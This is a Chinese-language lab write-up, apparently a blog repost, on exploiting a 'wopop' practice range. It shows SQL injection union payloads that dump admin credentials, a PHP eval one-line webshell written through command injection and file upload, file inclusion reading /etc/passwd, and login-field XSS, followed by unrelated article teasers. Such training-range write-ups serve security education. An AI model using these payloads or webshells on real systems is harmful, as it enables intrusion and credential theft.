wopop靶场漏洞挖掘练习

news/2024/12/22 14:17:27/

一、sql注入漏洞

1.在搜索框输入-1 union select 1,2,3#

可以看到页面有回显

2.查询数据库

-1 union select 1,2,database()#

3.通过查询admin表的数据可以进行登录后台

-1 union select 1,2,group_concat(user_name,user_pass) from admin#

二、文件上传漏洞

1.登录后台最下面有一个上传文件

2.上传一句话木马

上传并访问一句话木马

3.使用蚁剑连接

三、命令执行漏洞

1.在shell输入框输入whoami页面会执行

2.尝试写入一句话木马

echo '<?php @eval($_POST[cmd]); ?>' > cc.php

3.访问cc.php

可以访问成功

四、文件包含漏洞

1.在关于界面可以看到url里使用file进行传参

尝试能不能访问其他文件

可以访问到/etc/passwd文件 说明存在文件包含漏洞

五、XSS漏洞

在登录页面的username处输入弹窗代码

发现可以出现弹窗 说明存在xss漏洞


http://www.ppmy.cn/news/1526870.html

相关文章

程易科技AI OS:赋能开发者,构建智慧未来

【引言】 随着人工智能技术的迅猛发展&#xff0c;越来越多的企业和个人投身于AI应用的研发之中。在这个过程中&#xff0c;一套高效、灵活且功能强大的开发平台显得尤为重要。程易科技推出的人工智能操作系统&#xff08;AI OS&#xff09;&#xff0c;正是为了满足这一市场需…

Oracle(119)如何执行闪回数据库(Flashback Database)操作?

执行闪回数据库&#xff08;Flashback Database&#xff09;操作是 Oracle 数据库提供的一项功能&#xff0c;允许你将数据库恢复到过去的某个时间点。这对于修复用户错误或数据损坏非常有用。以下是详细的步骤和代码示例&#xff0c;展示如何执行闪回数据库操作。 前提条件 …

HTML 和 CSS

使用 HTML 和 CSS 制作网页的详细指南 前言 在现代 Web 开发中&#xff0c;HTML 和 CSS 是构建网页的基础技术。HTML&#xff08;超文本标记语言&#xff09;用于定义网页的结构和内容&#xff0c;而 CSS&#xff08;层叠样式表&#xff09;用于控制网页的外观和布局。掌握这…

OpenJudge | 八皇后问题

总时间限制: 10000ms 内存限制: 65536kB 描述 在国际象棋棋盘上放置八个皇后&#xff0c;要求每两个皇后之间不能直接吃掉对方。 输入 无输入。 输出 按给定顺序和格式输出所有八皇后问题的解&#xff08;见Sample Output&#xff09;。 样例输入 (null)样例输出 No. 1 …

云原生和非云原生哪个好?六大区别详细对比

云原生和非云原生哪个好&#xff1f;云原生和非云原生各有优劣&#xff0c;具体选择取决于应用场景。云原生利用云计算的优势&#xff0c;通过微服务、容器化和自动化运维等技术&#xff0c;提高了应用的可扩展性、更新速度和成本效益。非云原生则可能更适合对延迟敏感或不需要…

链动321模式小程序开发源码

链动31模式概述 链动31模式是一种基于技术的新型商业模式&#xff0c;它通过激励用户分享和推广&#xff0c;实现用户、企业和平台的共赢。该模式通常涉及商品展示、积分系统、分享推广和排行榜等功能&#xff0c;旨在通过用户之间的社交裂变来扩大销售和品牌影响力。如何开发这…

java-lambda-常用方法总结汇总

1、获取对象集合中的一个字段生成新的集合&#xff0c;【List<BeanA> 转 List<Long>&#xff0c;List<BeanA> 转 Set<Long>&#xff0c;List<BeanA> 转 String】 //查询结果 List<MnsBusinessMessageVO> list businessMessageMapper.list…

【STM32】esp8266连接wifi

1.配置stm32cubemx 使用串口二接收esp8266的数据&#xff0c;单片机接收&#xff0c;使用串口1将数据发送给串口助手 串口2波特率设置74880&#xff0c;串口1设置115200 在初始化的时候需要将复位引脚拉低20ms,然后再拉高20ms, 设置GPIOB的输出模式 对PB12做输出处理 2.…